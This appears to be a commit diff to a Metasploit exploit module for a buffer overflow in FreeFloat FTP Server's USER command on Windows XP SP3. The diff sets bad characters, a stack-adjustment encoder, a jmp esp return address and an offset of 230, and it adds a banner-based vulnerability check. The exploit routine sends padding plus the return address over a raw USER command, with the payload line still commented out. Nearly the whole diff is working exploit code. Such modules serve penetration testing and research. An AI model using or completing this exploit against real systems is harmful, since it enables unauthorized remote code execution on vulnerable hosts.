freefloatftp_user.rb

Author: dougsko

modules/exploits/windows/ftp/freefloatftp_user.rb

@@ -10,6 +10,7 @@
 class Metasploit4 < Msf::Exploit::Remote
 	Rank = LowRanking
 
+	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Ftp
 
 	def initialize(info = {})
@@ -33,16 +34,17 @@ def initialize(info = {})
 			'Payload'		 =>
 				{
 					'Space'          => 500,
-					#'DisableNops'    => true,
-					#'BadChars'       => "\x00\x0a\x0d\x20\x5c",
-					#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+					'DisableNops'    => true,
+					'BadChars'       => "\x00\x0a\x0d\x20\x5c",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
 			'Targets'		 =>
 				[
 					[ 'Windows XP SP3',
 						{
-							'Ret' => 0x7E379353, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
-							'Offset'   => 228
+							'Ret' => 0x7cb41020, # jmp esp 
+							#'Ret' => 0xDEADBEEF,
+							'Offset'   => 230
 						}
 					],
 				],
@@ -54,10 +56,23 @@ def initialize(info = {})
 			], self.class)
 	end
 
+	def check
+		connect
+		disconnect
+		print_status(banner)
+		if (banner =~ /220 FreeFloat Ftp Server (Version 1.00)/)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
 	def exploit
 		connect
-		buf = pattern_create(300)
-		send_cmd( ['USER ', buf], false )
+		buf = rand_text(target['Offset'])
+		buf << [ target['Ret'] ].pack('V')
+		#buf << payload.encoded
+		raw_send("USER #{buf}\r\n")
+		#send_user(buf)
 		disconnect
 	end